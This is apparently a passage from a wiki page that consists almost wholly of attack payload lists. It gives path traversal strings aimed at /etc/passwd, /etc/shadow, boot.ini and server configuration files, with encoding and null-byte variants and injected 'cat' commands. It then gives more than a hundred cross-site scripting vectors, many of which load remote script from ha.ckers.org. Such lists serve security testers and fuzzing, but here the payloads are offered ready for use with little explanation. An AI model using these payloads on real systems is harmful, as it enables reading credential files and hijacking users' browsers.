%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
%%32%65%%32%66%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
../../../../../../../../../../../../etc/hosts%00&lt;br /&gt;
../../../../../../../../../../../../etc/hosts&lt;br /&gt;
../../boot.ini&lt;br /&gt;
/../../../../../../../../%2A&lt;br /&gt;
../../../../../../../../../../../../etc/passwd%00&lt;br /&gt;
../../../../../../../../../../../../etc/passwd&lt;br /&gt;
../../../../../../../../../../../../etc/shadow%00&lt;br /&gt;
../../../../../../../../../../../../etc/shadow&lt;br /&gt;
/../../../../../../../../../../etc/passwd^^&lt;br /&gt;
/../../../../../../../../../../etc/shadow^^&lt;br /&gt;
/../../../../../../../../../../etc/passwd&lt;br /&gt;
/../../../../../../../../../../etc/shadow&lt;br /&gt;
/./././././././././././etc/passwd&lt;br /&gt;
/./././././././././././etc/shadow&lt;br /&gt;
\..\..\..\..\..\..\..\..\..\..\etc\passwd&lt;br /&gt;
\..\..\..\..\..\..\..\..\..\..\etc\shadow&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\etc\passwd&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\etc\shadow&lt;br /&gt;
/..\../..\../..\../..\../..\../..\../etc/passwd&lt;br /&gt;
/..\../..\../..\../..\../..\../..\../etc/shadow&lt;br /&gt;
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd&lt;br /&gt;
.\\./.\\./.\\./.\\./.\\./.\\./etc/shadow&lt;br /&gt;
\..\..\..\..\..\..\..\..\..\..\etc\passwd%00&lt;br /&gt;
\..\..\..\..\..\..\..\..\..\..\etc\shadow%00&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\etc\passwd%00&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\etc\shadow%00&lt;br /&gt;
%0a/bin/cat%20/etc/passwd&lt;br /&gt;
%0a/bin/cat%20/etc/shadow&lt;br /&gt;
%00/etc/passwd%00&lt;br /&gt;
%00/etc/shadow%00&lt;br /&gt;
%00../../../../../../etc/passwd&lt;br /&gt;
%00../../../../../../etc/shadow&lt;br /&gt;
/../../../../../../../../../../../etc/passwd%00.jpg&lt;br /&gt;
/../../../../../../../../../../../etc/passwd%00.html&lt;br /&gt;
/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/passwd&lt;br /&gt;
/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/shadow&lt;br /&gt;
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd&lt;br /&gt;
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/shadow&lt;br /&gt;
%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00&lt;br /&gt;
/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00&lt;br /&gt;
%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%&lt;br /&gt;
/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..winnt/desktop.ini&lt;br /&gt;
\\&amp;amp;amp;apos;/bin/cat%20/etc/passwd\\&amp;amp;amp;apos;&lt;br /&gt;
\\&amp;amp;amp;apos;/bin/cat%20/etc/shadow\\&amp;amp;amp;apos;&lt;br /&gt;
../../../../../../../../conf/server.xml&lt;br /&gt;
/../../../../../../../../bin/id|&lt;br /&gt;
C:/inetpub/wwwroot/global.asa&lt;br /&gt;
C:\inetpub\wwwroot\global.asa&lt;br /&gt;
C:/boot.ini&lt;br /&gt;
C:\boot.ini&lt;br /&gt;
../../../../../../../../../../../../localstart.asp%00&lt;br /&gt;
../../../../../../../../../../../../localstart.asp&lt;br /&gt;
../../../../../../../../../../../../boot.ini%00&lt;br /&gt;
../../../../../../../../../../../../boot.ini&lt;br /&gt;
/./././././././././././boot.ini&lt;br /&gt;
/../../../../../../../../../../../boot.ini%00&lt;br /&gt;
/../../../../../../../../../../../boot.ini&lt;br /&gt;
/..\../..\../..\../..\../..\../..\../boot.ini&lt;br /&gt;
/.\\./.\\./.\\./.\\./.\\./.\\./boot.ini&lt;br /&gt;
\..\..\..\..\..\..\..\..\..\..\boot.ini&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\boot.ini%00&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\boot.ini&lt;br /&gt;
/../../../../../../../../../../../boot.ini%00.html&lt;br /&gt;
/../../../../../../../../../../../boot.ini%00.jpg&lt;br /&gt;
/.../.../.../.../.../&lt;br /&gt;
..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../boot.ini&lt;br /&gt;
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/boot.ini&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
''Sorry for breaking the layout - but &amp;quot;breaking the layout&amp;quot; could become &amp;quot;breaking the software&amp;quot;.'' &lt;br /&gt;
&lt;br /&gt;
=== XSS Statements - Most effective/most common statements  ===&lt;br /&gt;
&lt;br /&gt;
Testing Statements &lt;br /&gt;
&amp;lt;pre&amp;gt;';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//&amp;quot;;alert(String.fromCharCode(88,83,83))//\&amp;quot;;alert(String.fromCharCode(88,83,83))//--&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&amp;amp;gt;'&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83))&amp;amp;lt;/SCRIPT&amp;amp;gt; &lt;br /&gt;
'';!--&amp;quot;&amp;amp;lt;XSS&amp;amp;gt;=&amp;amp;amp;{()}&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
Common exploit code (covers a lot of XSS vulnerabilities) &lt;br /&gt;
&amp;lt;pre&amp;gt;'&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83))&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;amp;lt;img src=&amp;quot;&amp;quot; alt='&lt;br /&gt;
&amp;quot;&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83))&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;amp;lt;img src=&amp;quot;&amp;quot; alt=&amp;quot;&lt;br /&gt;
\'&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83))&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;amp;lt;img src=&amp;quot;&amp;quot; alt=\'&lt;br /&gt;
'); alert('xss'); var x='&lt;br /&gt;
\\'); alert(\'xss\');var x=\'&lt;br /&gt;
//--&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83));&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
=== XSS Statements (Full List) - (Update: 11 August 2009 - Total Statements: 162) &lt;br /&gt;
&amp;lt;pre&amp;gt;Statements&lt;br /&gt;
&amp;amp;lt;SCRIPT SRC=http://ha.ckers.org/xss.js&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;IMG SRC=JaVaScRiPt:alert('XSS')&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=javascript:alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=`javascript:alert(&amp;quot;&amp;quot;RSnake says, 'XSS'&amp;quot;&amp;quot;)`&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG &amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;IMG SRC=javascript:alert(String.fromCharCode(88,83,83))&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG SRC=&amp;amp;amp;#0000106&amp;amp;amp;#0000097&amp;amp;amp;#0000118&amp;amp;amp;#0000097&amp;amp;amp;#0000115&amp;amp;amp;#0000099&amp;amp;amp;#0000114&amp;amp;amp;#0000105&amp;amp;amp;#0000112&amp;amp;amp;#0000116&amp;amp;amp;#0000058&amp;amp;amp;#0000097&amp;amp;amp;#0000108&amp;amp;amp;#0000101&amp;amp;amp;#0000114&amp;amp;amp;#0000116&amp;amp;amp;#0000040&amp;amp;amp;#0000039&amp;amp;amp;#0000088&amp;amp;amp;#0000083&amp;amp;amp;#0000083&amp;amp;amp;#0000039&amp;amp;amp;#0000041&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG SRC=&amp;amp;amp;#x6A&amp;amp;amp;#x61&amp;amp;amp;#x76&amp;amp;amp;#x61&amp;amp;amp;#x73&amp;amp;amp;#x63&amp;amp;amp;#x72&amp;amp;amp;#x69&amp;amp;amp;#x70&amp;amp;amp;#x74&amp;amp;amp;#x3A&amp;amp;amp;#x61&amp;amp;amp;#x6C&amp;amp;amp;#x65&amp;amp;amp;#x72&amp;amp;amp;#x74&amp;amp;amp;#x28&amp;amp;amp;#x27&amp;amp;amp;#x58&amp;amp;amp;#x53&amp;amp;amp;#x53&amp;amp;amp;#x27&amp;amp;amp;#x29&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;jav&amp;quot;&lt;br /&gt;
&amp;quot;ascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;perl -e 'print &amp;quot;&amp;quot;&amp;amp;lt;IMG SRC=java\0script:alert(\&amp;quot;&amp;quot;XSS\&amp;quot;&amp;quot;)&amp;amp;gt;&amp;quot;&amp;quot;;' &amp;amp;gt; out&amp;quot;&lt;br /&gt;
&amp;quot;perl -e 'print &amp;quot;&amp;quot;&amp;amp;lt;SCR\0IPT&amp;amp;gt;alert(\&amp;quot;&amp;quot;XSS\&amp;quot;&amp;quot;)&amp;amp;lt;/SCR\0IPT&amp;amp;gt;&amp;quot;&amp;quot;;' &amp;amp;gt; out&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot; &amp;amp;amp;#14;  javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT/XSS SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;BODY onload!#$%&amp;amp;amp;()*~+-_.,:;?@[/|\]^`=alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT/SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;);//&amp;amp;lt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;SCRIPT SRC=http://ha.ckers.org/xss.js?&amp;amp;lt;B&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;SCRIPT SRC=//ha.ckers.org/.j&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;quot;&lt;br /&gt;
&amp;amp;lt;iframe src=http://ha.ckers.org/scriptlet.html &amp;amp;lt;&lt;br /&gt;
&amp;amp;lt;SCRIPT&amp;amp;gt;a=/XSS/\nalert(a.source)&amp;amp;lt;/SCRIPT&amp;amp;gt;&lt;br /&gt;
&amp;quot;\&amp;quot;&amp;quot;;alert('XSS');//&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;/TITLE&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;);&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;INPUT TYPE=&amp;quot;&amp;quot;IMAGE&amp;quot;&amp;quot; SRC=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;BODY BACKGROUND=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;BODY ONLOAD=alert('XSS')&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG DYNSRC=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG LOWSRC=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;BGSOUND SRC=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;BR SIZE=&amp;quot;&amp;quot;&amp;amp;amp;{alert('XSS')}&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;LAYER SRC=&amp;quot;&amp;quot;http://ha.ckers.org/scriptlet.html&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/LAYER&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;LINK REL=&amp;quot;&amp;quot;stylesheet&amp;quot;&amp;quot; HREF=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;LINK REL=&amp;quot;&amp;quot;stylesheet&amp;quot;&amp;quot; HREF=&amp;quot;&amp;quot;http://ha.ckers.org/xss.css&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;STYLE&amp;amp;gt;@import'http://ha.ckers.org/xss.css';&amp;amp;lt;/STYLE&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;Link&amp;quot;&amp;quot; Content=&amp;quot;&amp;quot;&amp;amp;lt;http://ha.ckers.org/xss.css&amp;amp;gt;; REL=stylesheet&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE&amp;amp;gt;BODY{-moz-binding:url(&amp;quot;&amp;quot;http://ha.ckers.org/xssmoz.xml#xss&amp;quot;&amp;quot;)}&amp;amp;lt;/STYLE&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;XSS STYLE=&amp;quot;&amp;quot;behavior: url(xss.htc);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE&amp;amp;gt;li {list-style-image: url(&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;);}&amp;amp;lt;/STYLE&amp;amp;gt;&amp;amp;lt;UL&amp;amp;gt;&amp;amp;lt;LI&amp;amp;gt;XSS&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC='vbscript:msgbox(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)'&amp;amp;gt;&amp;quot;&lt;br /&gt;
¼script¾alert(¢XSS¢)¼/script¾&lt;br /&gt;
&amp;quot;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;refresh&amp;quot;&amp;quot; CONTENT=&amp;quot;&amp;quot;0;url=javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;refresh&amp;quot;&amp;quot; CONTENT=&amp;quot;&amp;quot;0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;refresh&amp;quot;&amp;quot; CONTENT=&amp;quot;&amp;quot;0; URL=http://;URL=javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IFRAME SRC=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/IFRAME&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;FRAMESET&amp;amp;gt;&amp;amp;lt;FRAME SRC=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/FRAMESET&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;TABLE BACKGROUND=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;TABLE&amp;amp;gt;&amp;amp;lt;TD BACKGROUND=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;DIV STYLE=&amp;quot;&amp;quot;background-image: url(javascript:alert('XSS'))&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;DIV STYLE=&amp;quot;&amp;quot;background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;DIV STYLE=&amp;quot;&amp;quot;background-image: url(&amp;amp;amp;#1;javascript:alert('XSS'))&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;DIV STYLE=&amp;quot;&amp;quot;width: expression(alert('XSS'));&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE&amp;amp;gt;@im\port'\ja\vasc\ript:alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)';&amp;amp;lt;/STYLE&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG STYLE=&amp;quot;&amp;quot;xss:expr/*XSS*/ession(alert('XSS'))&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;XSS STYLE=&amp;quot;&amp;quot;xss:expression(alert('XSS'))&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;exp/*&amp;amp;lt;A STYLE='no\xss:noxss(&amp;quot;&amp;quot;*//*&amp;quot;&amp;quot;);xss:ex/*XSS*//*/*/pression(alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;))'&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE TYPE=&amp;quot;&amp;quot;text/javascript&amp;quot;&amp;quot;&amp;amp;gt;alert('XSS');&amp;amp;lt;/STYLE&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE&amp;amp;gt;.XSS{background-image:url(&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;);}&amp;amp;lt;/STYLE&amp;amp;gt;&amp;amp;lt;A CLASS=XSS&amp;amp;gt;&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE type=&amp;quot;&amp;quot;text/css&amp;quot;&amp;quot;&amp;amp;gt;BODY{background:url(&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;)}&amp;amp;lt;/STYLE&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;!--[if gte IE 4]&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert('XSS');&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;amp;lt;![endif]--&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;BASE HREF=&amp;quot;&amp;quot;javascript:alert('XSS');//&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;OBJECT TYPE=&amp;quot;&amp;quot;text/x-scriptlet&amp;quot;&amp;quot; DATA=&amp;quot;&amp;quot;http://ha.ckers.org/scriptlet.html&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/OBJECT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389&amp;amp;gt;&amp;amp;lt;param name=url value=javascript:alert('XSS')&amp;amp;gt;&amp;amp;lt;/OBJECT&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;EMBED SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.swf&amp;quot;&amp;quot; AllowScriptAccess=&amp;quot;&amp;quot;always&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/EMBED&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;EMBED SRC=&amp;quot;&amp;quot;data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==&amp;quot;&amp;quot; type=&amp;quot;&amp;quot;image/svg+xml&amp;quot;&amp;quot; AllowScriptAccess=&amp;quot;&amp;quot;always&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/EMBED&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;HTML xmlns:xss&amp;amp;gt;&amp;amp;lt;?import namespace=&amp;quot;&amp;quot;xss&amp;quot;&amp;quot; implementation=&amp;quot;&amp;quot;http://ha.ckers.org/xss.htc&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;xss:xss&amp;amp;gt;XSS&amp;amp;lt;/xss:xss&amp;amp;gt;&amp;amp;lt;/HTML&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;XML ID=I&amp;amp;gt;&amp;amp;lt;X&amp;amp;gt;&amp;amp;lt;C&amp;amp;gt;&amp;amp;lt;![CDATA[&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javas]]&amp;amp;gt;&amp;amp;lt;![CDATA[cript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;]]&amp;amp;gt;&amp;amp;lt;/C&amp;amp;gt;&amp;amp;lt;/X&amp;amp;gt;&amp;amp;lt;/xml&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;XML ID=&amp;quot;&amp;quot;xss&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;I&amp;amp;gt;&amp;amp;lt;B&amp;amp;gt;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javas&amp;amp;lt;!-- --&amp;amp;gt;cript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/B&amp;amp;gt;&amp;amp;lt;/I&amp;amp;gt;&amp;amp;lt;/XML&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=&amp;quot;&amp;quot;#xss&amp;quot;&amp;quot; DATAFLD=&amp;quot;&amp;quot;B&amp;quot;&amp;quot; DATAFORMATAS=&amp;quot;&amp;quot;HTML&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;XML SRC=&amp;quot;&amp;quot;xsstest.xml&amp;quot;&amp;quot; ID=I&amp;amp;gt;&amp;amp;lt;/XML&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;HTML&amp;amp;gt;&amp;amp;lt;BODY&amp;amp;gt;&amp;amp;lt;?xml:namespace prefix=&amp;quot;&amp;quot;t&amp;quot;&amp;quot; ns=&amp;quot;&amp;quot;urn:schemas-microsoft-com:time&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;?import namespace=&amp;quot;&amp;quot;t&amp;quot;&amp;quot; implementation=&amp;quot;&amp;quot;#default#time2&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;t:set attributeName=&amp;quot;&amp;quot;innerHTML&amp;quot;&amp;quot; to=&amp;quot;&amp;quot;XSS&amp;amp;lt;SCRIPT DEFER&amp;amp;gt;alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/BODY&amp;amp;gt;&amp;amp;lt;/HTML&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.jpg&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;!--#exec cmd=&amp;quot;&amp;quot;/bin/echo '&amp;amp;lt;SCR'&amp;quot;&amp;quot;--&amp;amp;gt;&amp;amp;lt;!--#exec cmd=&amp;quot;&amp;quot;/bin/echo 'IPT SRC=http://ha.ckers.org/xss.js&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;'&amp;quot;&amp;quot;--&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;? echo('&amp;amp;lt;SCR)';echo('IPT&amp;amp;gt;alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)&amp;amp;lt;/SCRIPT&amp;amp;gt;');&amp;amp;nbsp;?&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;Set-Cookie&amp;quot;&amp;quot; Content=&amp;quot;&amp;quot;USERID=&amp;amp;lt;SCRIPT&amp;amp;gt;alert('XSS')&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
